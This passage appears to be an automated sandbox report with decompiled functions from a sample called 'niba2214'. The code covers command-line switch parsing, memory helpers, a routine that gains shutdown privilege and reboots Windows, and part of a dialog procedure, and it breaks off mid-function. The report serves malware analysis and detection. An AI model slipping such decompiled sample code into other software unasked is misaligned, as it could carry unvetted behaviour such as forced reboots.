Instruction Fuzzy Hash: EBF01C31921B0A9E87B19F3BDC8175AFBE6AB952603100A2FD96ED2150F7B06481CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012566AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012566AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x012566b1
0x012566ba
0x012566c7
0x012566bc
0x012566be
0x012566be

APIs

GetFileAttributesA.KERNELBASE(?,01254777,?,01254E38,?), ref: 012566B1

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f1703937082a0c6fb584b93ffe5151a595858e26bfc337c529833a6cabaae4d8
Instruction ID: 45cee6d8ab8a1ec971646fff6d602fe403c462d95bb77fdaa1495de8517a6b94
Opcode Fuzzy Hash: f1703937082a0c6fb584b93ffe5151a595858e26bfc337c529833a6cabaae4d8
Instruction Fuzzy Hash: DFB09276232542466B61063578AA65A2841A6C123A7E41B90F132C12E4CA3EC446D114

Uniqueness

Uniqueness Score: -1.00%

Function 01254CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01254CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x01254caa
0x01254cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 01254CAA

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 4cca72562788ecb6e4b93d22ca19df2d5a17b5c0d8a065912c385e744ddd4e4d
Instruction ID: 61803e6732886b1c1b7164c25cf9d7a0de47134e289fb45e048b053bf1e30ed3
Opcode Fuzzy Hash: 4cca72562788ecb6e4b93d22ca19df2d5a17b5c0d8a065912c385e744ddd4e4d
Instruction Fuzzy Hash: 55B0123204430CB7CF101EC2F80EF863F1DE7C4771F140000F60C460408A7294108795

Uniqueness

Uniqueness Score: -1.00%

Function 01254CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01254CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x01254cc8
0x01254ccf

APIs

GlobalFree.KERNEL32 ref: 01254CC8

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: d3b887f9b6294d89c1c2943d97b8df4347b19f37ea7dd793e6c47003c7d4630f
Instruction ID: b55ef2004a2ed462c524eea1f7782178c46b8dceb0a9914f4ea05320e54bdcc3
Opcode Fuzzy Hash: d3b887f9b6294d89c1c2943d97b8df4347b19f37ea7dd793e6c47003c7d4630f
Instruction Fuzzy Hash: 6EB0123100020CB78F101A42F80D8453F1DD6C02707000010F60C420118B3398118684

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01255C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01255C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x1258004; // 0x958f311c
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E01256CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E01256E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x1258004; // 0x958f311c
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0125597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E012544B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x1259124 = E01256285();
									_t75 = 0;
								}
								return E01256CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E012544B9(0, 0x521, 0x1251140, 0, 0x40, 0);
												_t85 =  *0x1258588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0125667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0125667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E01255C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E01251680(0x1258c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0125667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0125667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x1258a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E01255C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x1258b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x1258a3a;
																}
																E01251680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0125658A(_t218, 0x104, 0x1251140);
																if(E012531E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x1258a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x1258a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x1258a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x1258a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x1258a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x1259a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x1259a2c =  *0x1259a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x1258d48 =  *0x1258d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x1259a2c =  *0x1259a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x1259a2c =  *0x1259a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x1258d48 =  *0x1258d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x1259a2c =  *0x1259a2c | 0x00000004;
																										L70:
																										 *0x1258a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x1259a2c = 3;
																	 *0x1258a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x1258a2c != 0 &&  *0x1258b3e == 0) {
						if(GetModuleFileNameA( *0x1259a3c, 0x1258b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E012566C8(0x1258b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x01255c9e
0x01255ca9
0x01255cb0
0x01255cb3
0x01255cb6
0x01255cb7
0x01255cb8
0x01255cbd
0x01256204
0x01255ccb
0x00000000
0x01255ccb
0x01255cd3
0x01255cd7
0x01255cf4
0x00000000
0x01255cf4
0x01255cf8
0x01255d00
0x00000000
0x01255d06
0x01255d06
0x01255d0e
0x01255d10
0x01255d12
0x01255d14
0x01255d15
0x01255d17
0x01255d49
0x00000000
0x00000000
0x00000000
0x00000000
0x01255d19
0x01255d19
0x01255d1d
0x00000000
0x01255d3f
0x01255d3f
0x01255d4b
0x01255d4b
0x01255d4f
0x01255d8d
0x00000000
0x01255d93
0x01255d93
0x01255d9a
0x01255d9d
0x01255d9e
0x00000000
0x01255d9e
0x01255d51
0x01255d5b
0x01255d72
0x012560fb
0x012560fb
0x01256207
0x0125620a
0x0125620b
0x0125620e
0x01256217
0x01255d78
0x01255d78
0x01255d80
0x01255d83
0x01255d84
0x00000000
0x01255d84
0x01255d5d
0x01255d5f
0x01255d62
0x01255d68
0x01255d64
0x01255d64
0x01255d64
0x00000000
0x01255d62
0x01255d5b
0x01255d4f
0x01255d1d
0x00000000
0x01255d9f
0x01255d9f
0x01255da5
0x01255dab
0x01255dba
0x01256218
0x0125621d
0x01256220
0x01256221
0x01256229
0x01256230
0x01256247
0x0125626a
0x01256272
0x01256249
0x01256255
0x0125625f
0x01256264
0x01256264
0x01256284
0x01255dc0
0x01255dc0
0x01255dca
0x01255e22
0x00000000
0x00000000
0x00000000
0x00000000
0x01255dcc
0x01255dce
0x01255e24
0x01255e24
0x01255e2c
0x01255e47
0x01255e4a
0x012561d2
0x012561e2
0x012561e7
0x012561ee
0x012561f1
0x012561f1
0x012561f8
0x012561f8
0x01255e50
0x01255e53
0x01256109
0x0125611f
0x00000000
0x01256125
0x01256137
0x0125613a
0x0125613c
0x0125613e
0x0125613e
0x01256141
0x01256141
0x01256143
0x01256144
0x0125614a
0x00000000
0x01256150
0x01256152
0x0125615c
0x01256170
0x01256172
0x0125617c
0x01256190
0x01256190
0x01256196
0x012561a5
0x00000000
0x012561ab
0x012561b9
0x012561c6
0x012561c6
0x0125617e
0x01256180
0x0125618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0125618a
0x0125615e
0x01256160
0x0125616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0125616a
0x0125615c
0x0125614a
0x0125610b
0x0125610e
0x0125610e
0x00000000
0x01255e59
0x01255e59
0x01255e5c
0x0125604f
0x01256056
0x00000000
0x0125605c
0x0125606e
0x01256071
0x01256073
0x01256075
0x01256075
0x01256078
0x01256078
0x0125607a
0x0125607b
0x01256081
0x00000000
0x01256087
0x01256087
0x0125608d
0x0125609c
0x00000000
0x012560a2
0x012560aa
0x012560b2
0x012560b7
0x012560bd
0x012560bf
0x012560bf
0x012560d6
0x012560e0
0x012560e7
0x012560f5
0x00000000
0x00000000
0x00000000
0x00000000
0x012560f5
0x0125609c
0x01256081
0x01255e62
0x01255e62
0x01255e65
0x01255fd3
0x01255fe9
0x00000000
0x01255fef
0x01255fef
0x01255ff7
0x01255ffd
0x01256003
0x01256006
0x01256011
0x01256014
0x0125603d
0x01256016
0x01256018
0x01256019
0x0125601b
0x01256033
0x0125601d
0x01256020
0x01256029
0x01256022
0x01256022
0x01256022
0x01256020
0x0125601b
0x01256042
0x01256044
0x01256046
0x0125604a
0x01255ff7
0x01255fd5
0x01255fd8
0x01255fd8
0x00000000
0x01255e6b
0x01255e6b
0x01255e6e
0x01255f8b
0x01255f99
0x00000000
0x01255f9f
0x01255fa7
0x01255faf
0x00000000
0x01255fb1
0x01255fb3
0x00000000
0x01255fb5
0x01255fb7
0x00000000
0x01255fb9
0x00000000
0x01255fb9
0x01255fb7
0x01255fb3
0x01255faf
0x01255f8d
0x01255f8d
0x01255f8d
0x01255f8f
0x01255fc1
0x01255fc1
0x01255fc1
0x00000000
0x01255e74
0x01255e74
0x01255e77
0x01255ea0
0x01255ebd
0x01255f79
0x00000000
0x01255f7f
0x01255ec3
0x01255ec3
0x01255ecc
0x01255ed4
0x01255ed6
0x01255edc
0x01255edf
0x01255eea
0x01255eed
0x01255f3f
0x01255f40
0x00000000
0x01255eef
0x01255eef
0x01255ef2
0x01255f34
0x01255ef4
0x01255ef4
0x01255ef7
0x01255f2b
0x00000000
0x01255ef9
0x01255ef9
0x01255efc
0x01255f22
0x00000000
0x01255efe
0x01255eff
0x01255f02
0x01255f16
0x01255f04
0x01255f07
0x01255f0d
0x01255f46
0x01255f46
0x01255f09
0x01255f09
0x01255f09
0x01255f07
0x01255f02
0x01255efc
0x01255ef7
0x01255ef2
0x01255f4c
0x01255f4e
0x01255f50
0x01255f54
0x01255ed4
0x01255ea2
0x01255ea4
0x01255eaf
0x01255eaf
0x00000000
0x01255e79
0x01255e7d
0x00000000
0x01255e83
0x01255e83
0x01255e83
0x01255e85
0x01255e85
0x01255e8e
0x00000000
0x01255e94
0x00000000
0x01255e94
0x01255e8e
0x01255e7d
0x01255e77
0x01255e6e
0x01255e65
0x01255e5c
0x00000000
0x00000000
0x00000000
0x01255dd0
0x01255dd0
0x01255dd0
0x00000000
0x01255dd0
0x01255dce
0x01255dca
0x01255dba
0x00000000
0x01255d00
0x01255dd9
0x01255e04
0x012561fe
0x01255e0a
0x01255e0c
0x01255e17
0x01255e17
0x01255e04
0x01256200
0x01256200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 01255CEE
GetModuleFileNameA.KERNEL32(01258B3E,00000104,00000000,?,?), ref: 01255DFC
CharUpperA.USER32(?), ref: 01255E3E
CharUpperA.USER32(-00000052), ref: 01255EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 01255F6F
CharUpperA.USER32(?), ref: 01255FA7
CharUpperA.USER32(-0000004E), ref: 01256008
CharUpperA.USER32(?), ref: 012560AA
CloseHandle.KERNEL32(00000000,01251140,00000000,00000040,00000000), ref: 012561F1
ExitProcess.KERNEL32 ref: 012561F8

Strings

:, xrefs: 01256118
RegServer, xrefs: 01255F66
", xrefs: 01255D78
", xrefs: 0125612D

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 81ce31177c02d9605a92d8c7e37424c00d394a5831f9a9fec23b47642a963b99
Instruction ID: bd3546c2169eca5af9bf0cfa54e6cf15425a740cf8b5f342a3965686458b32f9
Opcode Fuzzy Hash: 81ce31177c02d9605a92d8c7e37424c00d394a5831f9a9fec23b47642a963b99
Instruction Fuzzy Hash: 57D15B71A342475FEFF68A3C98CD3B97FA1AB16354F4481A9CF86C6145D6B489C28F00

Uniqueness

Uniqueness Score: -1.00%

Function 01251F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E01251F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x1259a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x1258004; // 0x958f311c
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E012544B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E01256CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E012544B9(0, 0x522, 0x1251140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E01251EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x01251f90
0x01251f90
0x01251f93
0x01251f98
0x01251fa4
0x01251fa7
0x01251fc5
0x01251fcd
0x01251fdb
0x01251ee5
0x01251eea
0x01251ef1
0x01251ef4
0x01251f0c
0x01251f2e
0x01251f3a
0x01251f46
0x01251f4d
0x01251f58
0x01251f60
0x01251f61
0x01251f62
0x01251f75
0x01251f80
0x01251f77
0x01251f77
0x00000000
0x01251f77
0x01251f64
0x01251f64
0x00000000
0x01251f64
0x01251f0e
0x01251f0e
0x01251f13
0x01251f13
0x01251f14
0x01251f14
0x01251f16
0x01251f17
0x01251f1a
0x01251f1f
0x01251f1f
0x01251f86
0x01251f8f
0x01251fcf
0x01251fd3
0x00000000
0x01251fd3
0x01251fa9
0x01251fb4
0x01251fbb
0x01251fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x01251fc3
0x01251f9a
0x01251f9a
0x01251fa2
0x01251fd9
0x01251fda
0x00000000
0x00000000
0x00000000
0x01251fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 01251EFB
OpenProcessToken.ADVAPI32(00000000), ref: 01251F02
ExitWindowsEx.USER32(00000002,00000000), ref: 01251FD3

Strings

SeShutdownPrivilege, xrefs: 01251F28

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 2612fdb273736c96b78c268e5b2266ab187980e1621dbf1f3417e9c046eeb812
Instruction ID: 8981889730d811750078afc4500621cd2f3ecdd072d879b5e17adae4c38629ae
Opcode Fuzzy Hash: 2612fdb273736c96b78c268e5b2266ab187980e1621dbf1f3417e9c046eeb812
Instruction Fuzzy Hash: 9121E571A60306ABDBB05AA5ACCEFBF7AB8EB85B50F100119FF02E7185D77484519361

Uniqueness

Uniqueness Score: -1.00%

Function 01256CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01256CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x01256cf7
0x01256d00
0x01256d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,01256E26,01251000), ref: 01256CF7
UnhandledExceptionFilter.KERNEL32(01256E26,?,01256E26,01251000), ref: 01256D00
GetCurrentProcess.KERNEL32(C0000409,?,01256E26,01251000), ref: 01256D0B
TerminateProcess.KERNEL32(00000000,?,01256E26,01251000), ref: 01256D12

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 816aa3407428c146dd930ad19d9770ac94955f1145dc3c9b7ed0fdd3aa24c0ef
Instruction ID: 0fd2e9f215d7cf1cc3f8327d1844295e4147795bf521d8a0ce6ff5c44f16f257
Opcode Fuzzy Hash: 816aa3407428c146dd930ad19d9770ac94955f1145dc3c9b7ed0fdd3aa24c0ef
Instruction Fuzzy Hash: 8BD0C932000308BBDB202BF1F84EA593F28FB482A2F448100F31983004CA3254518B51

Uniqueness

Uniqueness Score: -1.00%

Function 01253210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E01253210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E012543D0(_t64, GetDesktopWindow());
